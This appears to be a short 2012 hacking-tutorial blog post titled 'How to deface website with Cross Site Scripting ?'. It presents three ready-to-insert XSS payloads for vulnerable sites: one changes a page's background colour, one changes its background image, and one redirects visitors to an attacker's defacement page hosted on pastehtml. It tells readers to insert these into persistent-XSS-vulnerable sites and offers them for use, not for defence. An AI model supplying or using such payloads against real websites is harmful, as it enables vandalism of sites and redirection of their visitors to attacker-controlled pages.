Tuesday, 31 January 2012

How to deface website with Cross Site Scripting ?

                                                                        Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!




Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>


Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites

0 comments :

Post a Comment